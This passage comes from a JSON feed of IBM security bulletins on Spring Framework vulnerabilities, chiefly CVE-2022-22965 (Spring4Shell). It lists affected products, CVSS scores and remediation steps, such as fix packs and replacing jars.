5.9}, "published": "2022-07-05T14:00:50", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool Impact is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": 
"2022-07-05T14:00:50", "id": "73A0E3B8972417A5C5268EE0E3803B9B8C2E0463C9659C6C828573AC1D00D1AB", "href": "https://www.ibm.com/support/pages/node/6601301", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:23:12", "description": "## Summary\n\nIBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]. To be vulnerable a product must meet all of the following criterias: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18. IBM Case Manager doesn't meet all of the criterias and, therefore, is not vulnerable.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the affected versions by applying the appropriate interim fix or upgrading.**\n\nAffected Product(s)| Version(s)| Remediation / Fix \n---|---|--- \nIBM Case Manager| V5.3.0 - V5.3.3| Apply IBM Case Manager interim fix for [DT143005](<https://www.ibm.com/mysupport/aCI3p000000Xio5> \"DT143005\" ) or upgrade to IBM Business Automation Workflow 22.0.1 or later. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T00:45:52", "type": "ibm", "title": "Security Bulletin: IBM Case Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-01T00:45:52", "id": "B547E4473646186969A14DFF0C2EB7D3D14D2E03EBA009074D6083D7482CB50F", "href": 
"https://www.ibm.com/support/pages/node/6825845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:54", "description": "## Summary\n\nIBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010| Apply 6.2.0.3.iFix013, available on [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+UNIX&release=6.2.0.3&platform=All&function=fixId&fixids=6.2.0.3*iFix013*&includeSupersedes=0> \"Fix Central\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-24T17:28:25", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-24T17:28:25", "id": "D5953B5AA5D620CA09590EAFE9008DB4A5BD219E8F43809D51B746D7643FA0F7", "href": "https://www.ibm.com/support/pages/node/6589575", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:22:15", "description": "## Summary\n\nCMIS is affected since it uses SpringFramework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963].\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6 \nCP4BA| 21.0.3 \nCP4BA| 22.0.1 \n \n\n\n## Remediation/Fixes\n\nCMIS has upgraded to SpringFramework version 5.3.18 in the below releases. 
\n \n\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6.0| [CMIS 3.0.6-IF2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Other+software/Content+Navigator&release=3.0.6&platform=All&function=all> \"CMIS 3.0.6-IF2\" ) \\- 8/2/2022 \nCP4BA| 21.0.3.0| [CP4BA 21.0.3-IF12](<https://www.ibm.com/support/pages/node/6612563> \"CP4BA 21.0.3-IF12\" ) \\- 9/1/2022 \nCP4BA| 22.0.1.0| [CP4BA 22.0.1-IF2](<https://www.ibm.com/support/pages/node/6612561> \"CP4BA 22.0.1-IF2\" ) \\- 9/2/2022 \n \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T15:36:16", "type": "ibm", "title": "Security Bulletin: CMIS is affected since it uses Spring Framework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-10-18T15:36:16", "id": "5303EB56B374789D2F25DD42CDE200B10A36458869D3BC5FB7882728637FFBF5", "href": 
"https://www.ibm.com/support/pages/node/6830265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:28:58", "description": "## Summary\n\nIBM Cloud Pak System is affected by a remote code execution in Spring Framework (CVE-2022-22965 and CVE-2020-5421). IBM Cloud Pak System ships with AWS component that includes it but is not used by it. The fix removes Spring from the product. This security bulletin service applies to IBM Cloud Pak System, IBM Cloud Pak System Software and IBM Cloud Pak System Software Suite.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. 
\nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System | 2.3.0.1, 2.3.1.1, 2.3.2.0 \nIBM Cloud Pak System | \n\n2.3.3.0, 2.3.3.1, 2.3.3.2, 2.3.3.3, 2.3.3.3 Interim Fix1 \n \n \n\n\n## Remediation/Fixes\n\nFor unsupported version/release/platform IBM recommends upgrading to a fixed, supported version of the product. \n\nIn response to the above vulnerabilities Cloud Pak System removed the related Spring classes with IBM Cloud Pak System v2.3.3.4. Customers are recommended to take action and upgrade as soon as possible. \n\nFor IBM Cloud Pak System v2.3.0.1 through V2.3.3.3 Interim Fix 1 upgrade to IBM Cloud Pak System V2.3.3.4 for Intel at [Fix Central.](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.3&platform=All&function=all>)\n\nInformation on upgrading at: <http://www.ibm.com/support/docview.wss?uid=ibm10887959>\n\nFor IBM Tivoli Monitoring pType review the corresponding product security bulletin at <https://www.ibm.com/support/pages/node/6587154>.\n\n## Workarounds and Mitigations\n\nRecommended action is to remove Spring classes manually. 
Contact IBM Cloud Pak System Support for details.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T08:28:51", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Spring Framework affect IBM Cloud Pak System (CVE-2022-22965, CVE-2020-5421)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5421", "CVE-2022-22965"], "modified": "2022-08-08T08:28:51", "id": "23258712AF0C6FF3D199FB0C84691351D550E3A4E86DEF3F1A107BF53AC16647", "href": "https://www.ibm.com/support/pages/node/6610851", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:25", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. 
QVM utilizes the Spring Framework to support our Java backed user interface. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. 
By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and 
Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:46", "description": "## Summary\n\nSecurity vulnerability in Spring Framework affects IBM Watson Explorer. IBM Watson Explorer has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. 
By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Foundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \n \n## Remediation/Fixes\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition \nFoundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9\n\n| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/12.0.x?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539806>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEFoundational-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. 
Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539808>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/11.0.2?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539814>)).\n 2. 
Download the interim fix for your edition (Enterprise or Advanced) from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.11&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-<Edition>Foundational-IF001 **(EE for Enterprise Edition, AE for Advanced Edition).\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to <install_dir>/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to <install_dir>/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<http://www.ibm.com/support/pages/node/6497905>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.13&platform=All&function=all>): 